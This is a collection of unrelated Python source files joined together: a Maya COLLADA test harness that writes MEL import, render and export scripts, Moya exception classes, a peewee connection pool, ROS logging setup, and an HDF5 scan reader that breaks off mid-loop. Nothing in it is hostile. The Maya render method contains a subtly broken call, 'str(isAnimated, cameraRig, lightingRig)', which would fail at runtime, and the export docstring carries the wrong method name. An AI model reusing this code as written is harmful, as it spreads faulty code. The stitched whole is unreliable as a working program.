command = ("catch(`file -type \"mayaBinary\" -o \"" + filename + "\"`);\n")
elif (extension == "ma"):
command = ("catch(`file -type \"mayaAscii\" -o \"" + filename + "\"`);\n")
else:
command = ("catch(`file -type \"COLLADA importer\" -op \"" + options + "\" -o \"" + filename + "\"`);\n")
self.__melScript.write(
"$logname = \"" + logname.replace("\\", "/") + "\";\n" +
"$descriptor = `cmdFileOutput -o $logname`;\n" +
"catch(`file -f -new`);\n" +
command +
"catch(`file -rename \"" + output + "\"`);\n" +
"catch(`file -save -type \"mayaBinary\"`);\n" +
"cmdFileOutput -c $descriptor;\n" +
"fixNewlines $logname;\n\n")
self.__testImportCount = self.__testImportCount + 1
return [os.path.normpath(baseName + ".mb"),]
def WriteRender(self, logname, outputDir, settings, isAnimated, cameraRig, lightingRig):
"""WriteRender(logname, outputDir, settings, isAnimated, cameraRig, lightingRig) -> list_of_str
Implements FApplication.WriteRender()
"""
baseName = self.__currentImportProperName
output = os.path.normpath(os.path.join(outputDir, baseName))
outputDir = os.path.dirname(output)
self.__melScript.write(
"$logname = \"" + logname.replace("\\", "/") + "\";\n" +
"$descriptor = `cmdFileOutput -o $logname`;\n")
# Unlock all setAttr attributes (for reimported older Maya files)
self.__melScript.write("setAttr -lock off defaultRenderGlobals.startFrame;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.endFrame;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.byFrameStep;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.imageFormat;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.imageFilePrefix;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.animation;\n")
self.__melScript.write("setAttr -lock off defaultRenderGlobals.putFrameBeforeExt;\n")
# Set render globals example:
# Maya node types: renderGlobals, hardwareRenderGlobals,
# setAttr hardwareRenderGlobals.frameBufferFormat 0
for setting in settings:
# Start by parsing the value.
value = setting.GetValue().strip()
if (len(value) == 0):
value = self.FindDefault(FMaya_UIRender.__RENDER_OPTIONS, setting.GetPrettyName())
prettyName = setting.GetPrettyName()
if (prettyName == FMaya_UIRender.__RENDER_ANIMATION_START):
if not isAnimated: continue
start = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_ANIMATION_END):
if not isAnimated: continue
end = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_ANIMATION_STEP):
if not isAnimated: continue
step = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_STILL_START):
if isAnimated: continue
start = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_STILL_END):
if isAnimated: continue
end = int(value)
elif (prettyName == FMaya_UIRender.__RENDER_STILL_STEP):
if isAnimated: continue
step = int(value)
# Record these settings for later.
elif (prettyName == FMaya_UIRender.__RENDER_WIDTH):
width = value
continue
elif (prettyName == FMaya_UIRender.__RENDER_HEIGHT):
height = value
continue
elif (prettyName == FMaya_UIRender.__RENDER_CAMERA):
camera = value
continue
self.__melScript.write(setting.GetCommand() + " " + value + ";\n")
self.__melScript.write("setAttr defaultRenderGlobals.imageFormat 32;\n") # where 32 is PNG.
self.__melScript.write("setAttr -type \"string\" defaultRenderGlobals.imageFilePrefix \"" + str(baseName) + "\";\n")
self.__melScript.write("setAttr defaultRenderGlobals.animation " + str(isAnimated, cameraRig, lightingRig).lower() + ";\n")
self.__melScript.write("setAttr defaultRenderGlobals.putFrameBeforeExt true;\n")
self.__melScript.write("workspace -renderType \"images\" \"" + outputDir.replace("\\", "/") + "\";\n")
self.__melScript.write("catch(`hwRender -camera \"" + camera + "\" -width " + width + " -height " + height + "`);\n\n")
self.__melScript.write("cmdFileOutput -c $descriptor;\nfixNewlines $logname;\n\n")
# Record this folder for image look-ups, because Maya spreads images in unexpected ways.
self.__renderFolders.append(outputDir)
outputList = []
if not isAnimated:
outputList.append(os.path.normpath(output + ".png"))
else:
numDigit = len(str(end))
for i in range(start, end + 1, step):
outputList.append(os.path.normpath(output + "." + str(i) + ".png"))
return outputList
def WriteExport(self, logname, outputDir, settings, isAnimated, cameraRig, lightingRig):
"""WriteImport(logname, outputDir, settings, isAnimated, cameraRig, lightingRig) -> list_of_str
Implements FApplication.WriteExport()
"""
basename = self.__currentImportProperName + ".dae"
output = os.path.join(outputDir, self.__currentImportProperName)
output = output.replace("\\", "/")
options = ""
for setting in settings:
value = setting.GetValue().strip()
if (value == ""):
value = self.FindDefault(FMaya_UIRender.__EXPORT_OPTIONS,
setting.GetPrettyName())
options = (options + setting.GetCommand() + "=" +
value + ";")
self.__melScript.write(
"$logname = \"" + logname.replace("\\", "/") + "\";\n" +
"$descriptor = `cmdFileOutput -o $logname`;\n" +
"catch(`file -op \"" + options +
"\" -typ \"COLLADA exporter\" -pr -ea \"" + output +
"\"`);\n" +
"cmdFileOutput -c $descriptor;\n" +
"fixNewlines $logname;\n\n")
return [os.path.normpath(basename),]
|
|
from __future__ import unicode_literals
from __future__ import print_function
from .compat import text_type, implements_to_string
from .tools import textual_list
class ArchiveError(Exception):
"""Error occurred with an archive operation"""
class LogicError(Exception):
hide_py_traceback = True
error_type = "Logic Error"
def __init__(self, original, trace):
self.original = original
self.moya_trace = trace
super(LogicError, self).__init__(trace.msg)
@property
def diagnosis(self):
return getattr(self.original, "diagnosis", None)
def get_moya_frames(self):
return self.moya_trace.stack
def __moyaconsole__(self, console):
self.moya_trace.__moyaconsole__(console)
def __unicode__(self):
return self.moya_trace.msg
def __repr__(self):
return "<LogicError {}>".format(self.moya_trace.msg)
class MoyaError(Exception):
"""Base exception for Moya related errors"""
# The message to use if no error is supplied
default_message = ""
# The message to user if an error is supplied
message = "{error}"
def _escape_format(cls, text):
return text.replace("{", "{{").replace("}", "}}")
def __init__(self, error=None, **kwargs):
fmt_args = kwargs
fmt_args["error"] = error
msg = self.format_error(error, fmt_args)
if "diagnosis" in kwargs:
self.diagnosis = kwargs["diagnosis"]
super(MoyaError, self).__init__(msg)
def format_error(self, error, fmt_args):
if fmt_args:
fmt_args = {
k: self._escape_format(text_type(v)) for k, v in fmt_args.items()
}
if error is None:
msg = self.default_message.format(**fmt_args)
else:
# print error, repr(fmt_args)
# error = self._escape_format(error)
fmt_args["error"] = error.format(**fmt_args)
msg = self.message.format(**fmt_args)
return msg
def __moyaconsole__(self, console):
console.text(text_type(self))
__moyaconsole__.is_default_error_message = True
# def __unicode__(self):
# if self.fmt is None:
# return super(MoyaError, self).__unicode__()
# else:
# return self.fmt.format(**self.get_fmt_dict())
# def __str__(self):
# if self.fmt is None:
# return super(MoyaError, self).__str__()
# else:
# return self.fmt.format(**self.get_fmt_dict()).encode('ascii', 'replace')
class ParseError(MoyaError):
def __init__(self, message, path="?", position=None, code=None):
super(ParseError, self).__init__(message)
self.path = path
line, col = position
self.position = position
self.line = line
self.col = col
self.code = code
def render(self, colour=False):
line, col = self.position
lines = self.code.replace("\t", " " * 4).splitlines()
start = max(0, line - 3)
end = min(len(lines), line + 2)
showlines = lines[start:end]
linenos = [str(n + 1) for n in range(start, end)]
maxline = max(len(l) for l in linenos)
errorlines = []
highlight_line = str(line)
for lineno, line in zip(linenos, showlines):
if lineno == highlight_line:
fmt = "*%s %s"
else:
fmt = " %s %s"
errorlines.append(fmt % (lineno.ljust(maxline), line))
print("\n".join(errorlines))
@implements_to_string
class DocumentError(MoyaError):
"""Raised when there is an error constructing the document"""
def __init__(self, element, msg=""):
super(DocumentError, self).__init__()
self.element = element
self.msg = msg
def __repr__(self):
return "%s in %s" % (self.msg, self.element)
class AttributeError(MoyaError):
"""An attribute related parse error"""
hide_py_traceback = True
error_type = "Attribute error"
class BadValueError(MoyaError):
hide_py_traceback = True
error_type = "Invalid attribute error"
@implements_to_string
class ElementError(MoyaError):
error_type = "Element error"
hide_py_traceback = True
def __init__(self, msg=None, element=None, diagnosis=None):
self.msg = msg
self.element = element
self.diagnosis = diagnosis
super(ElementError, self).__init__(msg)
@property
def source_line(self):
if self.element:
return getattr(self.element, "source_line", None)
return None
def get_message(self):
if self.element is None:
return self.msg
# path = self.element._document.path
# line = self.element.source_line or '?'
return "in {}, {}".format(self.element, self.msg)
# return 'Document "%s", line %s, in <%s>: %s' % (path,
# line,
# self.element._tag_name,
# self.msg)
def __str__(self):
return text_type(self.get_message())
class ContentError(ElementError):
error_type = "Content Error"
class ElementNotFoundError(MoyaError):
default_message = "element '{elementref}' was not found in the project"
hide_py_traceback = True
error_type = "Element not found error"
def __init__(self, elementref, app=None, lib=None, msg=None, reason=None):
if isinstance(elementref, tuple):
xmlns, ref = elementref
elementref = "{{" + xmlns + "}}" + ref
self.elementref = elementref
self.app = app
self.lib = lib
diagnosis = None
if msg is None:
if self.elementref and "#" not in self.elementref:
diagnosis = """\
Did you mean **"#{elementref}"** ?
Without the '#' symbol, Moya will look for the element with **docname="{elementref}"** in the current *file*.
Add a # if you meant to reference an element in the current *application*.
""".format(
elementref=self.elementref
)
if app or lib:
msg = "unable to reference element '{elementref}' in {obj}".format(
elementref=self.elementref, obj=self.app or self.lib
)
else:
msg = "unable to reference element '{elementref}'".format(
elementref=self.elementref
)
else:
msg = msg.replace("{", "{{").replace("}", "}}")
if reason is not None:
msg = "{} ({})".format(msg, reason)
super(ElementNotFoundError, self).__init__(
msg, elementref=elementref, diagnosis=diagnosis
)
# def get_message(self):
# if not (self.app or self.lib):
# return super(ElementNotFoundError, self).get_message()
# return "element '{elementref}' not found in {obj}".format(elementref=self.elementref,
# obj=self.app or self.lib)
class UnknownLibraryError(MoyaError):
default_message = "library '{lib}' must be imported before it can be installed"
hide_py_traceback = True
error_type = "Library not imported error"
def __init__(self, lib):
self.lib = lib
super(UnknownLibraryError, self).__init__(lib=lib)
class UnknownElementError(MoyaError):
default_message = "element {{{xmlns}}}{element} is not recognized"
def __init__(self, xmlns, element, source_line=None):
self.xmlns = xmlns
self.element = element
self.source_line = source_line
super(UnknownElementError, self).__init__(xmlns=xmlns, element=element)
class AmbiguousFilterError(MoyaError):
default_message = "filter is ambigious"
class UnknownFilterError(MoyaError):
default_message = "no such filter"
class AttributeTypeError(MoyaError):
"""An error caused by an attribute containing the wrong type of data"""
def __init__(self, element, name, value, type_name):
self.element = element
self.name = name
self.type_name = type_name
self.value = value
msg = "%r attribute should be a valid %s (not %r)" % (name, type_name, value)
super(AttributeTypeError, self).__init__(msg)
class ContextError(MoyaError):
pass
class LibraryLoadError(MoyaError):
"""Raised when a lib could not be read"""
hide_py_traceback = True
default_message = "Unable to load library '{lib}'"
message = "Unable to load library '{lib}' - {error}"
def __init__(self, error, lib=None, py_exception=None, **kwargs):
long_name = getattr(lib, "long_name", None)
if long_name is None:
lib = "<unknown>"
else:
lib = long_name
self.lib = lib
self.py_exception = py_exception
super(LibraryLoadError, self).__init__(error, lib=lib, **kwargs)
class StartupFailedError(MoyaError):
pass
class SettingsError(StartupFailedError):
pass
class LoggingSettingsError(StartupFailedError):
pass
class AppError(MoyaError):
hide_py_traceback = True
error_type = "Application Error"
class AmbiguousAppError(AppError):
default_message = (
"More than one app installed for lib '{lib_name}', choices are {apps}"
)
def __init__(self, lib_name, apps):
self.lib_name = lib_name
self.apps = apps
super(AmbiguousAppError, self).__init__(
lib_name=lib_name, apps=textual_list(apps)
)
class AppRequiredError(AppError):
default_message = "No application installed for lib '{lib}'"
def __init__(self, lib):
super(AppRequiredError, self).__init__(lib=lib)
class AppMissingError(AppError):
default_message = "A value for application is required"
class UnknownAppError(AppError):
default_message = "No app in the project referenced by '{app}'"
class MarkupError(Exception):
"""Unable to render markup"""
|
|
"""
Lightweight connection pooling for peewee.
In a multi-threaded application, up to `max_connections` will be opened. Each
thread (or, if using gevent, greenlet) will have it's own connection.
In a single-threaded application, only one connection will be created. It will
be continually recycled until either it exceeds the stale timeout or is closed
explicitly (using `.manual_close()`).
By default, all your application needs to do is ensure that connections are
closed when you are finished with them, and they will be returned to the pool.
For web applications, this typically means that at the beginning of a request,
you will open a connection, and when you return a response, you will close the
connection.
Simple Postgres pool example code:
# Use the special postgresql extensions.
from playhouse.pool import PooledPostgresqlExtDatabase
db = PooledPostgresqlExtDatabase(
'my_app',
max_connections=32,
stale_timeout=300, # 5 minutes.
user='postgres')
class BaseModel(Model):
class Meta:
database = db
That's it!
"""
import heapq
import logging
import time
from collections import namedtuple
from itertools import chain
try:
from psycopg2.extensions import TRANSACTION_STATUS_IDLE
from psycopg2.extensions import TRANSACTION_STATUS_INERROR
from psycopg2.extensions import TRANSACTION_STATUS_UNKNOWN
except ImportError:
TRANSACTION_STATUS_IDLE = \
TRANSACTION_STATUS_INERROR = \
TRANSACTION_STATUS_UNKNOWN = None
from peewee import MySQLDatabase
from peewee import PostgresqlDatabase
from peewee import SqliteDatabase
logger = logging.getLogger('peewee.pool')
def make_int(val):
if val is not None and not isinstance(val, (int, float)):
return int(val)
return val
class MaxConnectionsExceeded(ValueError): pass
PoolConnection = namedtuple('PoolConnection', ('timestamp', 'connection',
'checked_out'))
class PooledDatabase(object):
def __init__(self, database, max_connections=20, stale_timeout=None,
timeout=None, **kwargs):
self._max_connections = make_int(max_connections)
self._stale_timeout = make_int(stale_timeout)
self._wait_timeout = make_int(timeout)
if self._wait_timeout == 0:
self._wait_timeout = float('inf')
# Available / idle connections stored in a heap, sorted oldest first.
self._connections = []
# Mapping of connection id to PoolConnection. Ordinarily we would want
# to use something like a WeakKeyDictionary, but Python typically won't
# allow us to create weak references to connection objects.
self._in_use = {}
# Use the memory address of the connection as the key in the event the
# connection object is not hashable. Connections will not get
# garbage-collected, however, because a reference to them will persist
# in "_in_use" as long as the conn has not been closed.
self.conn_key = id
super(PooledDatabase, self).__init__(database, **kwargs)
def init(self, database, max_connections=None, stale_timeout=None,
timeout=None, **connect_kwargs):
super(PooledDatabase, self).init(database, **connect_kwargs)
if max_connections is not None:
self._max_connections = make_int(max_connections)
if stale_timeout is not None:
self._stale_timeout = make_int(stale_timeout)
if timeout is not None:
self._wait_timeout = make_int(timeout)
if self._wait_timeout == 0:
self._wait_timeout = float('inf')
def connect(self, reuse_if_open=False):
if not self._wait_timeout:
return super(PooledDatabase, self).connect(reuse_if_open)
expires = time.time() + self._wait_timeout
while expires > time.time():
try:
ret = super(PooledDatabase, self).connect(reuse_if_open)
except MaxConnectionsExceeded:
time.sleep(0.1)
else:
return ret
raise MaxConnectionsExceeded('Max connections exceeded, timed out '
'attempting to connect.')
def _connect(self):
while True:
try:
# Remove the oldest connection from the heap.
ts, conn = heapq.heappop(self._connections)
key = self.conn_key(conn)
except IndexError:
ts = conn = None
logger.debug('No connection available in pool.')
break
else:
if self._is_closed(conn):
# This connecton was closed, but since it was not stale
# it got added back to the queue of available conns. We
# then closed it and marked it as explicitly closed, so
# it's safe to throw it away now.
# (Because Database.close() calls Database._close()).
logger.debug('Connection %s was closed.', key)
ts = conn = None
elif self._stale_timeout and self._is_stale(ts):
# If we are attempting to check out a stale connection,
# then close it. We don't need to mark it in the "closed"
# set, because it is not in the list of available conns
# anymore.
logger.debug('Connection %s was stale, closing.', key)
self._close(conn, True)
ts = conn = None
else:
break
if conn is None:
if self._max_connections and (
len(self._in_use) >= self._max_connections):
raise MaxConnectionsExceeded('Exceeded maximum connections.')
conn = super(PooledDatabase, self)._connect()
ts = time.time()
key = self.conn_key(conn)
logger.debug('Created new connection %s.', key)
self._in_use[key] = PoolConnection(ts, conn, time.time())
return conn
def _is_stale(self, timestamp):
# Called on check-out and check-in to ensure the connection has
# not outlived the stale timeout.
return (time.time() - timestamp) > self._stale_timeout
def _is_closed(self, conn):
return False
def _can_reuse(self, conn):
# Called on check-in to make sure the connection can be re-used.
return True
def _close(self, conn, close_conn=False):
key = self.conn_key(conn)
if close_conn:
super(PooledDatabase, self)._close(conn)
elif key in self._in_use:
pool_conn = self._in_use.pop(key)
if self._stale_timeout and self._is_stale(pool_conn.timestamp):
logger.debug('Closing stale connection %s.', key)
super(PooledDatabase, self)._close(conn)
elif self._can_reuse(conn):
logger.debug('Returning %s to pool.', key)
heapq.heappush(self._connections, (pool_conn.timestamp, conn))
else:
logger.debug('Closed %s.', key)
def manual_close(self):
"""
Close the underlying connection without returning it to the pool.
"""
if self.is_closed():
return False
# Obtain reference to the connection in-use by the calling thread.
conn = self.connection()
# A connection will only be re-added to the available list if it is
# marked as "in use" at the time it is closed. We will explicitly
# remove it from the "in use" list, call "close()" for the
# side-effects, and then explicitly close the connection.
self._in_use.pop(self.conn_key(conn), None)
self.close()
self._close(conn, close_conn=True)
def close_idle(self):
# Close any open connections that are not currently in-use.
with self._lock:
for _, conn in self._connections:
self._close(conn, close_conn=True)
self._connections = []
def close_stale(self, age=600):
# Close any connections that are in-use but were checked out quite some
# time ago and can be considered stale.
with self._lock:
in_use = {}
cutoff = time.time() - age
n = 0
for key, pool_conn in self._in_use.items():
if pool_conn.checked_out < cutoff:
self._close(pool_conn.connection, close_conn=True)
n += 1
else:
in_use[key] = pool_conn
self._in_use = in_use
return n
def close_all(self):
# Close all connections -- available and in-use. Warning: may break any
# active connections used by other threads.
self.close()
with self._lock:
for _, conn in self._connections:
self._close(conn, close_conn=True)
for pool_conn in self._in_use.values():
self._close(pool_conn.connection, close_conn=True)
self._connections = []
self._in_use = {}
class PooledMySQLDatabase(PooledDatabase, MySQLDatabase):
def _is_closed(self, conn):
try:
conn.ping(False)
except:
return True
else:
return False
class _PooledPostgresqlDatabase(PooledDatabase):
def _is_closed(self, conn):
if conn.closed:
return True
txn_status = conn.get_transaction_status()
if txn_status == TRANSACTION_STATUS_UNKNOWN:
return True
elif txn_status != TRANSACTION_STATUS_IDLE:
conn.rollback()
return False
def _can_reuse(self, conn):
txn_status = conn.get_transaction_status()
# Do not return connection in an error state, as subsequent queries
# will all fail. If the status is unknown then we lost the connection
# to the server and the connection should not be re-used.
if txn_status == TRANSACTION_STATUS_UNKNOWN:
return False
elif txn_status == TRANSACTION_STATUS_INERROR:
conn.reset()
elif txn_status != TRANSACTION_STATUS_IDLE:
conn.rollback()
return True
class PooledPostgresqlDatabase(_PooledPostgresqlDatabase, PostgresqlDatabase):
pass
try:
from playhouse.postgres_ext import PostgresqlExtDatabase
class PooledPostgresqlExtDatabase(_PooledPostgresqlDatabase, PostgresqlExtDatabase):
pass
except ImportError:
PooledPostgresqlExtDatabase = None
class _PooledSqliteDatabase(PooledDatabase):
def _is_closed(self, conn):
try:
conn.total_changes
except:
return True
else:
return False
class PooledSqliteDatabase(_PooledSqliteDatabase, SqliteDatabase):
pass
try:
from playhouse.sqlite_ext import SqliteExtDatabase
class PooledSqliteExtDatabase(_PooledSqliteDatabase, SqliteExtDatabase):
pass
except ImportError:
PooledSqliteExtDatabase = None
try:
from playhouse.sqlite_ext import CSqliteExtDatabase
class PooledCSqliteExtDatabase(_PooledSqliteDatabase, CSqliteExtDatabase):
pass
except ImportError:
PooledCSqliteExtDatabase = None
|
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Library for configuring python logging to standard ROS locations (e.g. ROS_LOG_DIR).
"""
import os
import sys
import time
import logging
import logging.config
import inspect
import yaml
import rospkg
from rospkg.environment import ROS_LOG_DIR
class LoggingException(Exception): pass
class RospyLogger(logging.getLoggerClass()):
def findCaller(self, dummy=False): # Dummy second arg to match Python3 function declaration
"""
Find the stack frame of the caller so that we can note the source
file name, line number, and function name with class name if possible.
"""
file_name, lineno, func_name = super(RospyLogger, self).findCaller()[:3]
file_name = os.path.normcase(file_name)
f = inspect.currentframe()
if f is not None:
f = f.f_back
while hasattr(f, "f_code"):
# Search for the right frame using the data already found by parent class.
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == file_name and f.f_lineno == lineno and co.co_name == func_name:
break
f = f.f_back
# Jump up two more frames, as the logger methods have been double wrapped.
if f.f_back and f.f_code and f.f_code.co_name == '_base_logger':
f = f.f_back
if f.f_back:
f = f.f_back
co = f.f_code
func_name = co.co_name
# Now extend the function name with class name, if available.
try:
class_name = f.f_locals['self'].__class__.__name__
func_name = '%s.%s' % (class_name, func_name)
except KeyError: # if the function is unbound, there is no self.
pass
if sys.version_info > (3, 2):
# Dummy last argument to match Python3 return type
return co.co_filename, f.f_lineno, func_name, None
else:
return co.co_filename, f.f_lineno, func_name
logging.setLoggerClass(RospyLogger)
def renew_latest_logdir(logfile_dir):
log_dir = os.path.dirname(logfile_dir)
latest_dir = os.path.join(log_dir, 'latest')
if os.path.lexists(latest_dir):
if not os.path.islink(latest_dir):
return False
os.remove(latest_dir)
os.symlink(logfile_dir, latest_dir)
return True
def configure_logging(logname, level=logging.INFO, filename=None, env=None):
"""
Configure Python logging package to send log files to ROS-specific log directory
:param logname str: name of logger, ``str``
:param filename: filename to log to. If not set, a log filename
will be generated using logname, ``str``
:param env: override os.environ dictionary, ``dict``
:returns: log file name, ``str``
:raises: :exc:`LoggingException` If logging cannot be configured as specified
"""
if env is None:
env = os.environ
logname = logname or 'unknown'
log_dir = rospkg.get_log_dir(env=env)
# if filename is not explicitly provided, generate one using logname
if not filename:
log_filename = os.path.join(log_dir, '%s-%s.log'%(logname, os.getpid()))
else:
log_filename = os.path.join(log_dir, filename)
logfile_dir = os.path.dirname(log_filename)
if not os.path.exists(logfile_dir):
try:
makedirs_with_parent_perms(logfile_dir)
except OSError:
# cannot print to screen because command-line tools with output use this
if os.path.exists(logfile_dir):
# We successfully created the logging folder, but could not change
# permissions of the new folder to the same as the parent folder
sys.stderr.write("WARNING: Could not change permissions for folder [%s], make sure that the parent folder has correct permissions.\n"%logfile_dir)
else:
# Could not create folder
sys.stderr.write("WARNING: cannot create log directory [%s]. Please set %s to a writable location.\n"%(logfile_dir, ROS_LOG_DIR))
return None
elif os.path.isfile(logfile_dir):
raise LoggingException("Cannot save log files: file [%s] is in the way"%logfile_dir)
# the log dir itself should not be symlinked as latest
if logfile_dir != log_dir:
if sys.platform not in ['win32']:
try:
success = renew_latest_logdir(logfile_dir)
if not success:
sys.stderr.write("INFO: cannot create a symlink to latest log directory\n")
except OSError as e:
sys.stderr.write("INFO: cannot create a symlink to latest log directory: %s\n" % e)
config_file = os.environ.get('ROS_PYTHON_LOG_CONFIG_FILE')
if not config_file:
# search for logging config file in ROS_HOME, ROS_ETC_DIR or relative
# to the rosgraph package directory.
rosgraph_d = rospkg.RosPack().get_path('rosgraph')
for config_dir in [os.path.join(rospkg.get_ros_home(), 'config'),
rospkg.get_etc_ros_dir(),
os.path.join(rosgraph_d, 'conf')]:
for extension in ('conf', 'yaml'):
f = os.path.join(config_dir,
'python_logging{}{}'.format(os.path.extsep,
extension))
if os.path.isfile(f):
config_file = f
break
if config_file is not None:
break
if config_file is None or not os.path.isfile(config_file):
# logging is considered soft-fail
sys.stderr.write("WARNING: cannot load logging configuration file, logging is disabled\n")
logging.getLogger(logname).setLevel(logging.CRITICAL)
return log_filename
# pass in log_filename as argument to pylogging.conf
os.environ['ROS_LOG_FILENAME'] = log_filename
if config_file.endswith(('.yaml', '.yml')):
with open(config_file) as f:
dict_conf = yaml.safe_load(f)
dict_conf.setdefault('version', 1)
logging.config.dictConfig(dict_conf)
else:
# #3625: disabling_existing_loggers=False
logging.config.fileConfig(config_file, disable_existing_loggers=False)
return log_filename
def makedirs_with_parent_perms(p):
"""
Create the directory using the permissions of the nearest
(existing) parent directory. This is useful for logging, where a
root process sometimes has to log in the user's space.
:param p: directory to create, ``str``
"""
p = os.path.abspath(p)
parent = os.path.dirname(p)
# recurse upwards, checking to make sure we haven't reached the
# top
if not os.path.exists(p) and p and parent != p:
makedirs_with_parent_perms(parent)
s = os.stat(parent)
os.mkdir(p)
# if perms of new dir don't match, set anew
s2 = os.stat(p)
if s.st_uid != s2.st_uid or s.st_gid != s2.st_gid:
os.chown(p, s.st_uid, s.st_gid)
if s.st_mode != s2.st_mode:
os.chmod(p, s.st_mode)
_logging_to_rospy_names = {
'DEBUG': ('DEBUG', '\033[32m'),
'INFO': ('INFO', None),
'WARNING': ('WARN', '\033[33m'),
'ERROR': ('ERROR', '\033[31m'),
'CRITICAL': ('FATAL', '\033[31m')
}
_color_reset = '\033[0m'
_defaultFormatter = logging.Formatter()
class RosStreamHandler(logging.Handler):
def __init__(self, colorize=True, stdout=None, stderr=None):
super(RosStreamHandler, self).__init__()
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
self._colorize = colorize
try:
from rospy.rostime import get_time, is_wallclock
self._get_time = get_time
self._is_wallclock = is_wallclock
except ImportError:
self._get_time = None
self._is_wallclock = None
def emit(self, record):
level, color = _logging_to_rospy_names[record.levelname]
record_message = _defaultFormatter.format(record)
msg = os.environ.get(
'ROSCONSOLE_FORMAT', '[${severity}] [${time}]: ${message}')
msg = msg.replace('${severity}', level)
msg = msg.replace('${message}', str(record_message))
msg = msg.replace('${walltime}', '%f' % time.time())
msg = msg.replace('${thread}', str(record.thread))
msg = msg.replace('${logger}', str(record.name))
msg = msg.replace('${file}', str(record.pathname))
msg = msg.replace('${line}', str(record.lineno))
msg = msg.replace('${function}', str(record.funcName))
try:
from rospy import get_name
node_name = get_name()
except ImportError:
node_name = '<unknown_node_name>'
msg = msg.replace('${node}', node_name)
time_str = '%f' % time.time()
if self._get_time is not None and not self._is_wallclock():
time_str += ', %f' % self._get_time()
msg = msg.replace('${time}', time_str)
msg += '\n'
if record.levelno < logging.WARNING:
self._write(self._stdout, msg, color)
else:
self._write(self._stderr, msg, color)
def _write(self, fd, msg, color):
if self._colorize and color and hasattr(fd, 'isatty') and fd.isatty():
msg = color + msg + _color_reset
fd.write(msg)
|
|
'''
Created on May 2014
@author: Mirna Lerotic, 2nd Look Consulting
http://www.2ndlookconsulting.com/
'''
from __future__ import division
import string
import numpy as np
import h5py
import xml.etree.ElementTree as ET
from file_util import call_function_with_retry
class scan:
def __init__(self):
self.scan_name = ''
self.scan_time_stamp = ''
self.mca_calib_arr = [] #mca calibration array
self.mca_calib_description_arr = [] #mca calib description array
self.y_coord_arr = [] #y coordinates in mm
self.x_coord_arr = [] #x coordinates in mm
self.y_pixels = 0 #m pixel
self.x_pixels = 0 #n pixel
self.detector_arr = [] #nxmxo array ( o detectors)
self.detector_description_arr = [] #ox1 array
self.mca_arr = [] #nxmx2000xno.detectors array ( 2000 energies)
self.extra_pv = []
self.extra_pv_key_list = []
# ----------------------------------------------------------------------
class nxs:
def __init__(self, logger):
self.logger = logger
# ----------------------------------------------------------------------
def read_scan(self, filename):
# Open HDF5 file
f = call_function_with_retry(h5py.File, 5, 0.1, 1.1, (filename, 'r'))
if f == None:
self.logger.error('Error reading %s',filename)
return None
#f = h5py.File(filename, 'r')
if 'entry1' in f:
e1Grp = f['entry1']
if 'xml' in e1Grp:
xmlGrp = e1Grp['xml']
if 'ScanParameters' in xmlGrp:
scanpars = xmlGrp['ScanParameters']
scanpars = scanpars[...]
scanpars = scanpars[0]
root = ET.fromstring(scanpars)
keys = []
values = []
for child_of_root in root:
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
dScanPars = dict(zip(keys, values))
#self.logger.debug(dScanPars
if 'OutputParameters' in xmlGrp:
outpars = xmlGrp['OutputParameters']
outpars = outpars[...]
outpars = outpars[0]
root = ET.fromstring(outpars)
keys = []
values = []
for child_of_root in root:
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
dOutPars = dict(zip(keys, values))
#self.logger.debug( dOutPars
if 'DetectorParameters' in xmlGrp:
detpars = xmlGrp['DetectorParameters']
detpars = detpars[...]
detpars = detpars[0]
root = ET.fromstring(detpars)
keys = []
values = []
ndetgrp = 1
for child_of_root in root:
if child_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
else:
nionch = 1
apstr1 = ''
if child_of_root.tag.strip() == 'detectorGroup':
apstr1 = str(ndetgrp)
ndetgrp += 1
ndet = 1
for gchild_of_root in child_of_root:
apstr2 = ''
if gchild_of_root.tag.strip() == 'detector':
apstr2 = str(ndet)
ndet += 1
if gchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+apstr1+'/'+gchild_of_root.tag.strip()+apstr2)
values.append(gchild_of_root.text.strip())
else:
apstr3 = ''
if gchild_of_root.tag.strip() == 'ionChamber':
apstr3 = str(nionch)
nionch += 1
for ggchild_of_root in gchild_of_root:
